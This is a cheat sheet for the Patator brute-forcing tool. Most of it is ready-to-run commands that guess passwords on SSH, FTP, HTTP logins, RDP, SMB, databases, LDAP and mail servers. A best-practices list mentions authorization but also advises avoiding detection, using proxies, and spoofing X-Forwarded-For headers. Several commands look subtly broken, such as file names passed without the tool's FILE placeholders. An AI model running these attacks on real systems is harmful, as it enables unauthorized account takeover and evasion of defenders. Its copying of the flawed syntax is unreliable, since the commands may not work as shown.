Patator

Patator is a flexible Python-based multi-protocol brute forcing tool. It supports SSH, FTP, HTTP, RDP, databases, and many other protocols with modular design for custom modules.

Installation

Linux/Ubuntu

# From repository
sudo apt update
sudo apt install patator

# From source
git clone https://github.com/lanjelot/patator.git
cd patator
python3 -m pip install -r requirements.txt

# Make executable
chmod +x patator.py
sudo ln -s $(pwd)/patator.py /usr/local/bin/patator

macOS

# Install dependencies
brew install python3

# From source
git clone https://github.com/lanjelot/patator.git
cd patator
pip3 install paramiko pycurl

# Make executable
chmod +x patator.py

Basic Syntax

# General format
patator.py <MODULE> host=<target> user=<file> password=<file> -x ignore:mesg='Incorrect'

# Available modules
patator.py --help

Supported Modules

Module	Target
`ssh_login`	SSH authentication
`ftp_login`	FTP authentication
`http_fuzz`	HTTP fuzzing
`http_login`	HTTP form login
`rdp_login`	RDP/Remote Desktop
`smb_login`	Samba/SMB shares
`mysql_login`	MySQL database
`postgres_login`	PostgreSQL database
`mssql_login`	Microsoft SQL Server
`mongodb_login`	MongoDB authentication
`ldap_login`	LDAP directory
`imap_login`	IMAP email
`pop_login`	POP3 email
`smtp_login`	SMTP email
`vnc_login`	VNC remote desktop
`snmp_login`	SNMP community strings

SSH Brute Force

# Simple SSH brute force
patator.py ssh_login host=192.168.1.100 user=admin password=wordlist.txt -x ignore:mesg='Authentication failed'

# With username list
patator.py ssh_login host=10.0.0.50 user=users.txt password=passwords.txt

# Known username, multiple passwords
patator.py ssh_login host=target.com user=root password=FILE0 0=wordlist.txt port=22

SSH with Custom Options

# Specify SSH port
patator.py ssh_login host=target.com port=2222 user=admin password=wordlist.txt

# SSH key authentication
patator.py ssh_login host=target.com user=admin password=FILE0 0=keys.txt -x ignore:code=0

# Banner grabbing only
patator.py ssh_login host=target.com user=admin password=dummy -x ignore:mesg='.*' --only-status

FTP Brute Force

# Basic FTP brute force
patator.py ftp_login host=192.168.1.50 user=admin password=wordlist.txt -x ignore:code=530

# Multiple usernames
patator.py ftp_login host=ftp.example.com user=FILE0 password=FILE1 0=users.txt 1=passwords.txt

# Anonymous FTP check
patator.py ftp_login host=target.com user=anonymous password=test@test.com

HTTP-Based Attacks

# POST form brute force
patator.py http_fuzz url='http://target.com/login.php' method=POST body='user=admin&pass=FILE0' 0=wordlist.txt \
  -x ignore:code=403

# With custom headers
patator.py http_fuzz url='http://target.com/login' method=POST \
  body='username=FILE0&password=FILE1' \
  0=users.txt 1=passwords.txt \
  -H 'X-Forwarded-For: 127.0.0.1' \
  -x ignore:size=1234

# Maintain session with cookies
patator.py http_fuzz url='http://target.com/panel' method=POST \
  body='user=FILE0&pass=FILE1' \
  0=users.txt 1=wordlist.txt \
  -C cookies.txt \
  -x ignore:code=403

HTTP Basic Authentication

# HTTP Basic Auth
patator.py http_fuzz url='http://admin:FILE0@target.com/admin' method=GET 0=wordlist.txt

# With status code filtering
patator.py http_fuzz url='http://target.com/secure/' method=GET \
  -A 'user:FILE0' -A 'pass:FILE1' \
  0=users.txt 1=passwords.txt \
  -x ignore:code='403,404,500'

RDP Brute Force

Remote Desktop Services

# RDP login attack
patator.py rdp_login host=192.168.1.100 user=administrator password=wordlist.txt -x ignore:mesg='.*denied.*'

# Custom RDP port
patator.py rdp_login host=10.0.0.5 port=3389 user=admin password=FILE0 0=passwords.txt

# Domain user (Windows)
patator.py rdp_login host=dc.corp.local user=DOMAIN\FILE0 password=FILE1 \
  0=users.txt 1=passwords.txt

Database Brute Force

MySQL

# MySQL authentication
patator.py mysql_login host=192.168.1.200 user=root password=wordlist.txt database=mysql

# MySQL with alternate port
patator.py mysql_login host=db.internal port=3306 user=FILE0 password=FILE1 \
  0=users.txt 1=passwords.txt

PostgreSQL

# PostgreSQL brute force
patator.py postgres_login host=10.0.0.50 user=postgres password=wordlist.txt database=postgres

# Multiple targets
patator.py postgres_login host=FILE0 user=admin password=wordlist.txt 0=hosts.txt

Microsoft SQL Server

# MSSQL authentication
patator.py mssql_login host=192.168.1.100 user=sa password=wordlist.txt

# Named instance
patator.py mssql_login host=db.example.com:1433 user=sa password=FILE0 0=wordlist.txt

LDAP and Directory Services

# LDAP authentication
patator.py ldap_login url=ldap://ldap.example.com:389 user=cn=admin,dc=example,dc=com password=wordlist.txt

# LDAP with TLS
patator.py ldap_login url=ldaps://directory.corp.com:636 user=admin password=FILE0 0=wordlist.txt

Email Services

IMAP/POP3

# IMAP brute force
patator.py imap_login host=mail.example.com user=FILE0 password=wordlist.txt 0=emails.txt

# POP3 brute force
patator.py pop_login host=pop3.example.com user=admin password=FILE0 0=wordlist.txt

# SMTP authentication
patator.py smtp_login host=smtp.example.com user=admin password=wordlist.txt -x ignore:code=535

Advanced Features

Using Custom Payloads

# Multiple payload sources
patator.py ssh_login host=targets.txt user=FILE0 password=FILE1 -x ignore:mesg='.*failed' \
  0=usernames.txt 1=passwords.txt

# Static values with variables
patator.py http_fuzz url='http://FILE0/admin' method=GET user=admin password=test \
  0=hosts.txt

# Range expansion
patator.py ssh_login host=192.168.1.RANGE0 user=admin password=wordlist.txt 0=1-254 -x ignore:code=255

Response Filtering

# Ignore error messages
patator.py ssh_login host=target.com user=admin password=wordlist.txt \
  -x ignore:mesg='Authentication failed'

# Only show successful attempts
patator.py ssh_login host=target.com user=FILE0 password=FILE1 0=users.txt 1=wordlist.txt \
  -x ignore:code='1' \
  -x ignore:mesg='.*failed'

# Status codes
patator.py http_fuzz url='http://target.com/api' method=POST \
  body='user=admin&pass=FILE0' 0=wordlist.txt \
  -x ignore:code='401,403,500'

Timing and Threading

# Control request rate
patator.py ssh_login host=target.com user=admin password=wordlist.txt -t 5

# Parallel threads
patator.py ftp_login host=target.com user=admin password=FILE0 0=wordlist.txt -x ignore:code=530 -n 20

Wordlist Management

Create Effective Wordlists

# Extract words from website
curl -s http://target.com | tr ' ' '\n' | grep -E '^[a-z]+$' | sort -u > website_words.txt

# Common credentials
echo -e "admin\nadministrator\nroot\ntest\nuser\npassword" > common.txt

# Generate variations
for word in admin root test; do
  echo "$word"
  echo "${word}123"
  echo "${word}@123"
  echo "${word}_123"
done > variations.txt

# Combine wordlists
cat wordlist1.txt wordlist2.txt rockyou.txt | sort -u > combined.txt

# Download SecLists
git clone https://github.com/danielmiessler/SecLists.git

Real-World Examples

Corporate Network Assessment

# Test domain credentials
patator.py smb_login host=FILE0 user=FILE1 password=FILE2 0=dc_ips.txt 1=domain_users.txt 2=passwords.txt \
  -x ignore:code=1 -n 5

# RDP on multiple servers
patator.py rdp_login host=FILE0 user=domain\FILE1 password=FILE2 0=server_list.txt 1=users.txt 2=pass.txt

Web Application Testing

# Application login panel
patator.py http_fuzz url='http://app.internal/login' method=POST \
  body='username=FILE0&password=FILE1&submit=Login' \
  0=users.txt 1=wordlist.txt \
  -H 'User-Agent: Mozilla/5.0' \
  -x ignore:code='403,404'

Database Enumeration

# Test database credentials
patator.py mysql_login host=db.example.com user=FILE0 password=FILE1 0=db_users.txt 1=passwords.txt \
  -x ignore:mesg='.*Access denied'

Troubleshooting

Common Issues

Slow performance

# Reduce host timeout
patator.py ssh_login host=target.com user=admin password=wordlist.txt --timeout 10

# Increase threads (use caution)
patator.py ssh_login host=target.com user=admin password=wordlist.txt -n 50

Firewall rate limiting

# Reduce simultaneous connections
patator.py ftp_login host=target.com user=admin password=wordlist.txt -n 3 --timeout 30

Module not found

# Verify installation
python3 /path/to/patator/patator.py --help

# Install missing dependencies
pip3 install paramiko pycurl

Best Practices

Always obtain authorization before testing
Use appropriate thread counts to avoid detection
Target specific accounts with custom wordlists
Monitor firewall logs for blocking patterns
Use proxies/VPNs when applicable
Test in controlled lab environments first
Document all attempts and results
Know the difference between successful auth and false positives
Respect rate limiting; use delays between attempts
Combine with other reconnaissance tools

Last updated: 2025-03-30 | Patator GitHub